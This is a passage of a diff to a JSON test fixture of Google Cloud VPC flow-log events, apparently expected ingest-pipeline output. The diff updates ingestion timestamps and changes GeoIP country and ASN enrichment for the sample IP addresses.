{ - "region": "us-east1", - "project_id": "my-sample-project", - "zone": "us-east1-b" - } - }, - "vpcflow": { - "reporter": "DEST", - "rtt": { - "ms": 36 - } - } - }, - "event": { - "ingested": "2021-12-09T13:37:46.391584100Z", - "original": "{\"insertId\":\"bnj3cofh3cdka\",\"jsonPayload\":{\"bytes_sent\":\"1467\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":5601,\"protocol\":6,\"src_ip\":\"67.43.156.13\",\"src_port\":34090},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:46:37.827345444Z\",\"packets_sent\":\"7\",\"reporter\":\"DEST\",\"rtt_msec\":\"36\",\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"start_time\":\"2019-06-14T03:46:37.712749588Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:13.921248755Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:13.921248755Z\"}", - "kind": "event", - "start": "2019-06-14T03:46:37.712749588Z", - "end": "2019-06-14T03:46:37.827345444Z", - "id": "bnj3cofh3cdka", - "category": "network", - "type": "connection" } }, { @@ -7776,11 +8155,16 @@ }, "source": { "geo": { - "continent_name": "America", - "country_name": "usa" + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 15169 + "number": 35908 }, "address": "67.43.156.14", "port": 9200, @@ -7852,7 +8236,7 @@ } }, "event": { - "ingested": "2021-12-09T13:37:46.391588500Z", + "ingested": "2021-12-14T14:43:27.415215478Z", "original": "{\"insertId\":\"bnj3cofh3cdkn\",\"jsonPayload\":{\"bytes_sent\":\"170396\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":33530,\"protocol\":6,\"src_ip\":\"67.43.156.14\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:59.565300944Z\",\"packets_sent\":\"246\",\"reporter\":\"DEST\",\"rtt_msec\":\"1\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:00.140119099Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:13.921248755Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:13.921248755Z\"}", "kind": "event", "start": "2019-06-14T03:40:00.140119099Z", @@ -7868,11 +8252,16 @@ }, "destination": { "geo": { - "continent_name": "America", - "country_name": "usa" + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 15169 + "number": 35908 }, "address": "67.43.156.13", "port": 33570, @@ -7950,7 +8339,7 @@ } }, "event": { - "ingested": "2021-12-09T13:37:46.391592600Z", + "ingested": "2021-12-14T14:43:27.415215875Z", "original": "{\"insertId\":\"bnj3cofh3cdk5\",\"jsonPayload\":{\"bytes_sent\":\"171610\",\"connection\":{\"dest_ip\":\"67.43.156.13\",\"dest_port\":33570,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:51.821129119Z\",\"packets_sent\":\"71\",\"reporter\":\"SRC\",\"rtt_msec\":\"230\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:08.469473010Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:13.921248755Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:13.921248755Z\"}", "kind": "event", "start": "2019-06-14T03:40:08.469473010Z", @@ -7966,11 +8355,16 @@ }, "destination": { "geo": { - "continent_name": "America", - "country_name": "usa" + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 15169 + "number": 35908 }, "address": "67.43.156.13", "port": 33858, @@ -8048,7 +8442,7 @@ } }, "event": { - "ingested": "2021-12-09T13:37:46.391596300Z", + "ingested": "2021-12-14T14:43:27.415216266Z", "original": "{\"insertId\":\"bnj3cofh3cdk6\",\"jsonPayload\":{\"bytes_sent\":\"15186\",\"connection\":{\"dest_ip\":\"67.43.156.13\",\"dest_port\":33858,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:37.933164456Z\",\"packets_sent\":\"75\",\"reporter\":\"SRC\",\"rtt_msec\":\"253\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:08.458515996Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:13.921248755Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:13.921248755Z\"}", "kind": "event", "start": "2019-06-14T03:40:08.458515996Z", @@ -8064,11 +8458,16 @@ }, "destination": { "geo": { - "continent_name": "America", - "country_name": "usa" + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 15169 + "number": 35908 }, "address": "67.43.156.13", "port": 33590, @@ -8146,7 +8545,7 @@ } }, "event": { - "ingested": "2021-12-09T13:37:46.391600200Z", + "ingested": "2021-12-14T14:43:27.415216653Z", "original": "{\"insertId\":\"y4wffpfk2ero3\",\"jsonPayload\":{\"bytes_sent\":\"208416\",\"connection\":{\"dest_ip\":\"67.43.156.13\",\"dest_port\":33590,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:59.565116665Z\",\"packets_sent\":\"249\",\"reporter\":\"SRC\",\"rtt_msec\":\"109\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:05.147151100Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:16.453102376Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:16.453102376Z\"}", "kind": "event", "start": "2019-06-14T03:40:05.147151100Z", @@ -8244,7 +8643,7 @@ } }, "event": { - "ingested": "2021-12-09T13:37:46.391603600Z", + "ingested": "2021-12-14T14:43:27.415217044Z", "original": "{\"insertId\":\"y4wffpfk2eroh\",\"jsonPayload\":{\"bytes_sent\":\"90977\",\"connection\":{\"dest_ip\":\"192.168.2.177\",\"dest_port\":60108,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-central1\",\"vm_name\":\"suricata-iowa\",\"zone\":\"us-central1-a\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:54.108975753Z\",\"packets_sent\":\"357\",\"reporter\":\"SRC\",\"rtt_msec\":\"36\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:00.762958327Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:16.453102376Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:16.453102376Z\"}", "kind": "event", "start": "2019-06-14T03:40:00.762958327Z", @@ -8260,11 +8659,16 @@ }, "destination": { "geo": { - "continent_name": "America", - "country_name": "usa" + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 15169 + "number": 35908 }, "address": "67.43.156.13", "port": 33536, @@ -8342,7 +8746,7 @@ } }, "event": { - "ingested": "2021-12-09T13:37:46.391608Z", + "ingested": "2021-12-14T14:43:27.415217437Z", "original": "{\"insertId\":\"y4wffpfk2erom\",\"jsonPayload\":{\"bytes_sent\":\"187301\",\"connection\":{\"dest_ip\":\"67.43.156.13\",\"dest_port\":33536,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:59.565156020Z\",\"packets_sent\":\"242\",\"reporter\":\"SRC\",\"rtt_msec\":\"194\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:08.150481417Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:16.453102376Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:16.453102376Z\"}", "kind": "event", "start": "2019-06-14T03:40:08.150481417Z", @@ -8364,11 +8768,16 @@ }, "source": { "geo": { - "continent_name": "America", - "country_name": "usa" + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 15169 + "number": 35908 }, "address": "67.43.156.14", "port": 9200, @@ -8440,7 +8849,7 @@ } }, "event": { - "ingested": "2021-12-09T13:37:46.391613600Z", + "ingested": "2021-12-14T14:43:27.415217877Z", "original": "{\"insertId\":\"y4wffpfk2ero9\",\"jsonPayload\":{\"bytes_sent\":\"139106\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":33560,\"protocol\":6,\"src_ip\":\"67.43.156.14\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:59.565287007Z\",\"packets_sent\":\"244\",\"reporter\":\"DEST\",\"rtt_msec\":\"11\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:06.075859688Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:16.453102376Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:16.453102376Z\"}", "kind": "event", "start": "2019-06-14T03:40:06.075859688Z", @@ -8538,7 +8947,7 @@ } }, "event": { - "ingested": "2021-12-09T13:37:46.391619400Z", + "ingested": "2021-12-14T14:43:27.415218256Z", "original": "{\"insertId\":\"y4wffpfk2erog\",\"jsonPayload\":{\"bytes_sent\":\"1733360\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"192.168.2.177\",\"src_port\":60108},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:54.108975753Z\",\"packets_sent\":\"708\",\"reporter\":\"DEST\",\"rtt_msec\":\"36\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-central1\",\"vm_name\":\"suricata-iowa\",\"zone\":\"us-central1-a\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:00.762958327Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:16.453102376Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:16.453102376Z\"}", "kind": "event", "start": "2019-06-14T03:40:00.762958327Z", @@ -8554,11 +8963,16 @@ }, "destination": { "geo": { - "continent_name": "America", - "country_name": "usa" + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 15169 + "number": 35908 }, "address": "67.43.156.13", "port": 33874, @@ -8636,7 +9050,7 @@ } }, "event": { - "ingested": "2021-12-09T13:37:46.391624900Z", + "ingested": "2021-12-14T14:43:27.415218692Z", "original": "{\"insertId\":\"y4wffpfk2ero7\",\"jsonPayload\":{\"bytes_sent\":\"149157\",\"connection\":{\"dest_ip\":\"67.43.156.13\",\"dest_port\":33874,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:37.933099658Z\",\"packets_sent\":\"74\",\"reporter\":\"SRC\",\"rtt_msec\":\"142\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:20.513551480Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:16.453102376Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:16.453102376Z\"}", "kind": "event", "start": "2019-06-14T03:40:20.513551480Z", @@ -8658,11 +9072,16 @@ }, "source": { "geo": { - "continent_name": "America", - "country_name": "usa" + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 15169 + "number": 35908 }, "address": "67.43.156.13", "port": 33968, @@ -8734,7 +9153,7 @@ } }, "event": { - "ingested": "2021-12-09T13:37:46.391630400Z", + "ingested": "2021-12-14T14:43:27.415219084Z", "original": "{\"insertId\":\"y4wffpfk2eroe\",\"jsonPayload\":{\"bytes_sent\":\"11108\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"67.43.156.13\",\"src_port\":33968},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:37.965119632Z\",\"packets_sent\":\"95\",\"reporter\":\"DEST\",\"rtt_msec\":\"201\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:08.480430427Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:16.453102376Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:16.453102376Z\"}", "kind": "event", "start": "2019-06-14T03:40:08.480430427Z", @@ -8756,11 +9175,16 @@ }, "source": { "geo": { - "continent_name": "America", - "country_name": "usa" + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 15169 + "number": 35908 }, "address": "67.43.156.13", "port": 33590, @@ -8832,7 +9256,7 @@ } }, "event": { - "ingested": "2021-12-09T13:37:46.391635900Z", + "ingested": "2021-12-14T14:43:27.415219585Z", "original": "{\"insertId\":\"y4wffpfk2eroa\",\"jsonPayload\":{\"bytes_sent\":\"67337\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"67.43.156.13\",\"src_port\":33590},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:59.565116665Z\",\"packets_sent\":\"351\",\"reporter\":\"DEST\",\"rtt_msec\":\"109\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:05.147151100Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:16.453102376Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:16.453102376Z\"}", "kind": "event", "start": "2019-06-14T03:40:05.147151100Z", @@ -8854,11 +9278,16 @@ }, "source": { "geo": { - "continent_name": "America", - "country_name": "usa" + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 15169 + "number": 35908 }, "address": "67.43.156.14", "port": 9200, @@ -8930,7 +9359,7 @@ } }, "event": { - "ingested": "2021-12-09T13:37:46.391641300Z", + "ingested": "2021-12-14T14:43:27.415220055Z", "original": "{\"insertId\":\"y4wffpfk2eroi\",\"jsonPayload\":{\"bytes_sent\":\"136375\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":33538,\"protocol\":6,\"src_ip\":\"67.43.156.14\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:59.565287007Z\",\"packets_sent\":\"246\",\"reporter\":\"DEST\",\"rtt_msec\":\"36\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:39:59.500483335Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:16.453102376Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:16.453102376Z\"}", "kind": "event", "start": "2019-06-14T03:39:59.500483335Z", @@ -8946,11 +9375,16 @@ }, "destination": { "geo": { - "continent_name": "America", - "country_name": "usa" + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 15169 + "number": 35908 }, "address": "67.43.156.13", "port": 33690, @@ -9028,7 +9462,7 @@ } }, "event": { - "ingested": "2021-12-09T13:37:46.391646800Z", + "ingested": "2021-12-14T14:43:27.415220465Z", "original": "{\"insertId\":\"y4wffpfk2ero8\",\"jsonPayload\":{\"bytes_sent\":\"181424\",\"connection\":{\"dest_ip\":\"67.43.156.13\",\"dest_port\":33690,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:56.393929808Z\",\"packets_sent\":\"241\",\"reporter\":\"SRC\",\"rtt_msec\":\"196\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:06.075867049Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:16.453102376Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:16.453102376Z\"}", "kind": "event", "start": "2019-06-14T03:40:06.075867049Z", @@ -9050,11 +9484,16 @@ }, "source": { "geo": { - "continent_name": "America", - "country_name": "usa" + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 15169 + "number": 35908 }, "address": "67.43.156.13", "port": 33874, @@ -9126,7 +9565,7 @@ } }, "event": { - "ingested": "2021-12-09T13:37:46.391652400Z", + "ingested": "2021-12-14T14:43:27.415220862Z", "original": "{\"insertId\":\"y4wffpfk2erol\",\"jsonPayload\":{\"bytes_sent\":\"9303\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"67.43.156.13\",\"src_port\":33874},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:37.933099658Z\",\"packets_sent\":\"94\",\"reporter\":\"DEST\",\"rtt_msec\":\"142\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:20.513551480Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:16.453102376Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:16.453102376Z\"}", "kind": "event", "start": "2019-06-14T03:40:20.513551480Z", @@ -9142,11 +9581,16 @@ }, "destination": { "geo": { - "continent_name": "America", - "country_name": "usa" + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 15169 + "number": 35908 }, "address": "67.43.156.13", "port": 33572, @@ -9224,7 +9668,7 @@ } }, "event": { - "ingested": "2021-12-09T13:37:46.391657800Z", + "ingested": "2021-12-14T14:43:27.415221251Z", "original": 